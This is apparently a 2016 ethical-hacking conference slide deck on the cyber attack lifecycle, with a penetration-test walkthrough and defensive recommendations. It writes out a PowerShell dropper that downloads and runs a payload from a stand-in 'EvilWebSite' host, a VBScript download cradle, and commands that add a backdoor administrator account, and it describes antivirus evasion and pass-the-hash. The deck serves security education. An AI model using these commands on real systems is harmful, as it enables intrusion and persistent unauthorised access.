Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016

DIGITAL SECURITY FRONTLINE

Cyber SecurityAttack Methodologies

Agenda

• Objectives

• Introduction

• Cyber Attack Lifecycle

• Vulnerabilities and Exploitation

• Example of a penetration test scenario

• Conclusion

Objectives

Objectives

Get insights on the methodologies used during a Cyber Attack

Understand how hackers penetrate a network, elevate their privileges, maintain persistence and hide their malicious activities

Show hands-on:

Provide a concrete example using Metasploit tool

Show a Demo in real time

Deep dive into a real life pentesting exercise

Understand what can be done to protect against cyber attacks

Introduction

Introduction

Frédéric De Pauw

Co-Founder / Offensive Security @Avanguard

Ethical Hacker

Head IT Security @Ethias

Freelance Ethical Hacker (BE – LUX – US)

https://be.linkedin.com/in/fdepauw

Introduction

What is Cyber Crime?

Computer crime, or cybercrime, is crime that involves a computer and a network

Two types of Cyber Crime:

Technology is the Target. Enterprise, State systems, personal systems

Technology is the Instrument. Criminal activities on Internet

This session is focused on the first type

Introduction

Technology = Target Technology = instrument

Distributed Deny of Service Pedopornography

Hacking incitement to racial hatred

Malwares, Ransomwares Incitement to terrorism

Phishing Money Laundering

Hacktivism Drug sell

… Spam

…

Introduction Cyber Crime

Drastically evolved over the past years, following the global evolution of ICT supporting human activity

Allow cyber criminals to make profit equivalent as other types of criminality

Offers some advantages over other criminal activities: anonymity, discretion, borderless

Remain little fought and with no international legislation

Has evolved to cyber war with state-sponsored attacks

Will affect our life (connected cars, Operational Technologies, IOT)

Cost of Cyber Crime in Belgium: 3,5 billion Euros

Introduction

• Evolution of Cyber Crime

SOPHISTICATION

1985-1995

EntertainmentFirst Worms

Phone Hacking

2010-2016-…

HacktivismVirus Spread

Website Defacement

Organized CrimeDDOS

Company Systems HackingData Lead

Industrial espionage

Cyber WarTargeted Attacks

State-Sponsored Attacks

Introduction

Future of Cyber Crime

Intensification of targeted cyber attacks against enterprises with important impacts (financial, image..)

Predominance of Advanced Persistence Threats targeting the end user

Intensification of cyber war / cyber espionage activities between nations

Increase of cyber crime targeting connected objects and operational technologies

Hacking of a plane - 2015

Hacking of a pacemaker - 2013

Cars hacking - 2015

Introduction

Legal evolution

General Data Protection Regulation (GDPR) – adopted end of 2016 –comes into force 25 may 2018

Circulars of National Bank of Belgium

Regulation for financial sector

Data Breach notification standard

Within 72 hours

Fines in case of data leak

Max 4% of turnover, maximum 20 M€

Cyber Attack Life Cycle

Cyber Attack Lifecycle

- Public Information- Social Networks- Vulnerability Scanning- Physical Observation

1 Reconnaissance 2 Initial Infection

- Vulnerabilities- Virus / Malware- Social Engineering- Physical Intrusion

3 Gain Control 4 Privilege Escalation

Control infected system

5 Lateral Movement

Compromise more systems deeper in the network

7 Malicious Activities

Data ExfiltrationHacking WebsitesMoney Extortion

..Gain elevated privileges on the infected system

6 Persistence

Maintain persistent connection with infected systems

Cyber Attack Lifecycle> Reconnaissance

Reconnaissance process is a key activity

Indeed, during this phase crucial information are obtained in order to perform a cyber attack

For instance, information will be used to determined the best attack vector to be used

Activities performed are:

Collect information concerning the target (websites, telephone numbers, general mailboxes..) through public information

Collect information through direct contact sur as phone calls (fake poll, job seeker..)

Collect technical information concerning the target information system (exposed systems, partners, data centers..)

Collect information on premises (garbage, WIFI scanning..)

Actively scan enterprise networks exposed on Internet


Commercial Tool: MaltegoFree Tools (Kali Linux): • recon-ng• DMItry• theharvester


Wifi Reconnaissance and Hacking tools from hakshop.com

Cyber Attack Lifecycle > Reconnaissance

Following reconnaissance activities, attackers must have obtained enough information in order to determine best attack vectors in order to perform the initial infection phase

For instance:

Vulnerabilities infecting systems exposed on Internet

Lack of physical access to facilities

Social engineering attack on selected profiles from, for instance, social networks information

Cyber Attack Lifecycle> Initial Infection

Initial Infection is aimed at obtaining a first backdoor within the target information system

Vectors:

Exploiting a vulnerability affecting the victim’s system(s)

Infection through Virus / Malware

Exploiting a physical vulnerability

Installing rogue access points or devices

Cyber Attack Lifecycle > Initial Infection

PerimeterPublic Cloud

Private Cloud Corporate Network

On Prem ApplicationsServers / AppliancesSecurity Technology

SAAS ApplicationsServers / AppliancesSecurity Technology

Corporate ApplicationsServers / AppliancesSecurity Technology

Corporate ApplicationsServers / AppliancesSecurity TechnologyEnd Users


Lan Turtle from Hakshop

https://youtu.be/l8YpTOv7Q2A

https://youtu.be/l8YpTOv7Q2A

Cyber Attack Lifecycle > Initial Infection IDS/IPS Bypass

Encryption

Anti-Virus Bypass

Use simple Powershell as a dropper which fetches an encrypted payload over Internet

powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt '))

Unknown Viruses

Use Staging to decouple payload from initial dropper.

The dropper is injected directly into memory

Firewall Bypass

Uses “reverse” connections which connect to the C&C

E.g. HTTPS passing through the Enterprise Proxy


Free tool for malware code obfuscation

VEIL Evasion Framework

Generate obfuscated payload using several methodologies

Metasploit Meterpreter payloads

Generate payloads from different sources

C/C++ shellcode

Powershell shellcode

Python shellcode


Metasploit + Veil framework

Create a Meterpreter backdoor obfuscated with VEIL

Powershell type


Metasploit + VEIL Framework

Create a Meterpreter backdoor using VEIL for Antivirus Avoidance

Embed the Virus in a Word Macro, or create a .bat, include payload or fetch the payload on a Web Server



Start the Listener on Metasploit

More during the Demo

Cyber Attack Lifecycle > Gain Control

Once initial infection is performed, the objective is to get control over the machine.

For this a network connection must be established between the victim and the Command & Control Server

In general « reverse » connection is made to bypass inbound Firewall protection

Several techniques to bypass Outbound filtering (if present.)


Standard Enterprise security principles for Outbound filtering:

Default policy is to deny all outbound connections

Allowed outbound connections must go through a proxy

Outbound connections must conform to the expected protocol

Outbound connections must pass other checks as well.

Outbound filtering evasion techniques examples

Reverse HTTP and / or HTTPS traffic (without or with Proxy settings verification

Payload Staging over DNS by setting the payload into TXT Records of a Domain


Metasploit / Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

https://www.offensive-security.com/metasploit-unleashed/payloads/

Cyber Attack Lifecycle > Privilege Escalation

Escalate privileges from infected machines in order gain elevated access

Typical example is getting Administrator or System privileges

Several techniques

« Local Exploits » from local applications on the infected machine

Manual search for credentials in scripts

Password Hashes dump (e.g. SAM, /etc/passwd) and cracking

Authenticated Sessions grabbing (e.g. VPN Sessions)

SSH Keys

World Writeable files

Read command history files

Batches / Jobs alteration

Process Injection

Try injecting malicious code in processes running under « Domain Admin » privileged user

Cyber Attack Lifecycle > Privilege Escalation

Metasploit: « Incognito » module

Allows to impersonate authentication tokens on compromised windows hosts

Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens

TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts

Cyber Attack Lifecycle > Lateral Movement

From Infected systems, try to infect more systems deeper in the Network

Basically repeat the cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)

Aim for high value systems, windows domain controllers, file servers..

Techniques

Credential re-use / pass-the-hash / SSH keys re-use

Internal applications vulnerabilities (less often patched)

Network segmentation issues between environments ( e.g. Port 445) – PsExec with Pass-The-Hash


Metasploit – Pivoting technique

Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems



Use Autoroute to make the compromised host a pivot to other networks



Scan the network through the route created on ports 139 & 445



Start a new session on a new host using PsExec and “Pass-The-Hash” technique re-using local Administrator password hash

Cyber Attack Lifecycle > Maintain Persistence

Prevent loss of connection between infected machines and the C&C

Techniques

Create jobs / schedule tasks

Create service running on startup

Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)

Bootkit / Rootkit

Default file association

Logon Scripts

Modification of Applications / Services

Registry RUN keys

https://attack.mitre.org/wiki/Technique/T1103


Metasploit / Persistence module

Create a Meterpreter service which will start when the compromised host boots


Metasploit / Persistence module

Create a Meterpreter service which will start when the compromised host boots

Cyber Attack Lifecycle > Demo

Social Engineering scenario

Send a « Virus » to the victim which consists of a Metasploit Meterpreter instance

Undetected by up to date commercial antivirus

1. Prepare Malware & environment

2. Send Malware

3. Execute Malware

4. Get infected & Contact C&C

5. Interact

Vulnerabilities and Exploitation

Vulnerabilities and Exploitation A vulnerability is a flaw in a system which allows a malicious user to compromise its

Confidentiality, Integrity and / or its availability

Simple – Default Password. Complex – Buffer Overflow in an application

Dozens of new vulnerabilities officially classified everyday

http://www.cvedetails.com

Dozen of others are not disclosed!

0DAY – Vulnerabilities not discovered, or not disclosed

Vulnerabilities are discovered by

Researchers, students (Ethical Hackers)

Professional researchers ( Vulnerability Brokers )

http://www.zerodayinitiative.com/

France- Vupen Security – Sells vulnerabilities to NASA

Cyber Criminals( 0DAYS )

Vulnerabilities and Exploitation Full Disclosure principle

Vulnerabilities are reported and published publicly as soon as discovered without taking into account that a patch is available

Responsible disclosure principle

Vendors are notified first

Vulnerability is publicly disclosed after 45 days

Websites with vulnerabilities and associated exploits

www.securityfocus.com

www.1337day.com (not free)

http://www.cvedetails.com/

http://www.exploit-db.com/

Underground Websites on TOR network

Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR) ccc.de (ALL), blackhat.com (US)

Vulnerabilities and Exploitation

Vulnerabilities and Exploitation Complexity of systems, applicative codes, communication flows, network

segmentation

Out-of-the-box vulnerabilities of Vendor solutions, lack of security configuration

Next->Next->Next Syndrome

Lack of secure coding awareness

TOP 10 OWASP

Lack of enforcement for Security during IT Projects

Security implies Cost and Time

Need for functionality <-> Need for security

BlackList Mode

Learning Mode

Penetration test example


• Context: Black Box Intrusion test. Scope: External-facing systems

Web Servers

Ports 80 (HTTP) et 443 (HTTPS)

DMZ Intranet

Domaine Windows d’EntrepriseInternal Network


• VULN 1/2: Vulnerable deployment of SAP BO ( Apache Axis2 )• CVE-2010-0219 , Apache Axis2 Default Credentials

• http://www.securityfocus.com/bid/40343 , Apache Axis2 Directory traversal

• See earlier:• Vuln « Directory Traversal »

• Vuln « Default Password »

• Allows to have admin credentials to Axis2

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0219

http://www.securityfocus.com/bid/40343



• Access to Axis2 administration allows to upload a Web Service and hot deployment of it


• A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects Authenticated Code Execution

• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer

• We use it to deploy a reverse shell backdoor on the server to connect back to port 80

• VULN 3: Servers is allowed to contact any host on Internet on port 80 and 443

Web Servers


DMZ Intranet

Domaine Windows d’Entreprise

C&C SERVER – PORT 80

Port 80

Internal Network

http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer


• Not possible to upload a meterpreter (killed by AV on the machine)

• Possible to upload a backdoor which sends me back a DOS command prompt on the server


• Next steps:

• Create privileged account on the server• VULN 4: Application server is running under ADMIN privileges

• Net user temptest password /add

• Net localgroup Administrators hacked /add

• Obtain a Remote Desktop connection • Problem: Port 3389 closed Inbound

• Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389

Web ServersC&C SERVER – PORT 80

Port 3389

SSH SERVER – PORT 443

Reverse SSH TUNNEL / Port 443


• To create the tunnel, I need to download a SSH Client on the Server using DOS command prompt

• I create a VBSCRIPT script using « Echo » command, then execute the VBSCRIPT

• Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs

• Cscript dl.vbs

• Use plink to create the tunnel

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm: Set bStrm = createobject("Adodb.Stream")xHttp.Open "GET", "http://www.putty.com/plink.exe", FalsexHttp.Send

with bStrm.type = 1 '//binary.open.write xHttp.responseBody.savetofile "c:\temp\plink.exe", 2 '//overwrite

end with



Port 3389


Reverse SSH TUNNEL / Port 443

Connect to RDP through the tunnel and use the user account I just created to connect

temptest password


Next Step -> Lateral Movement – the simplest first, credentials reuse

I need to crack all passwords present locally on the infected server

Vuln 6/7: Windows 2003 Design Vulnerabilities

VULN 6: « Repair » file contains a SAM backup file containing encrypted credentials using LMHASH

VULN: LMHASH encryption algorithm is broken and can be cracked easily


After some minutes


VULN 8: Local Administrator password is replicated over all systems in the DMZ


Port 3389


Reverse SSH TUNNEL / Port 443 Web Servers

Web Servers

Web Servers

Port 3389


Next-Step: Try to hit Internal Network

VULN 9 : DMZ Systems members of Internal Windows Domain. Means that critical ports ( e.g. 139, 445, … ) must be open between DMZ and Internal network

VULN 10 : Password Replication Bis – A Domain Admin user account whose name is identical has a local account has the same password


I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and has full control over the Enterprise Domain

Web Servers


DMZ Intranet

Domaine Windows d’Entreprise

Contrôleur de Domaine

Domain Controller

Conclusion

Conclusion

Cyber Crime will continue to be a major threat for enterprises for the next years

Computer Vulnerabilities will continue to be discovered and will continue to affect enterprises

Legacy technologies such as standard AV are no longer sufficient to protect against cyber threats

Operational IT Security programs must address security incident response and must address each of the following:

Awareness

Preventive security

Detective security

Corrective security

Conclusion

[Personal Statement] Be careful with the notion of Risk-Based Security, based on asset classification

Should less critical systems be given less attention in terms of security?

If a Hacker can compromise a system in non critical zone and obtain credentials that are re-used in other zones? If the enterprise does not have one Windows Domain per Risk Domain?

Use Risk-Based security only if you have a full IT isolation… even thou is that enough?

Awareness

Educate all your employees to emergent cyber threats

Make real social-engineering exercises, with sending undetected Viruses to your employees

Be careful to human reaction

Educate but also protect colleagues who will be infected during the exercise

Conclusion

Preventive Security

Sandboxing technologies must be implemented in parallel with standard signature-based AV to protect against APTs

Implement NAC

Identify your vulnerabilities before the hackers

Network security must be governed: network segmentation policies, firewall rules governance, flow and application control, inbound and outbound traffic policies..

High Privileges Management

Isolation of network tiers

Use hardening best practices

E.g. Remove admin rights from end users and from applications (least privilege)

Implement correct Windows security settings

Conclusion

Detective security

Real-time correlation of technical use cases has a real added-value

Monitor for accounts creation on any system

Monitor any “Domain Admin” privilege elevation

Monitor for internal scans

Monitor authentication failures

Monitor denied outbound traffic

Corrective Security

Have emergency security procedures for containment defined and tested

Have a security incident response plan

Have a patching policy

Conclusion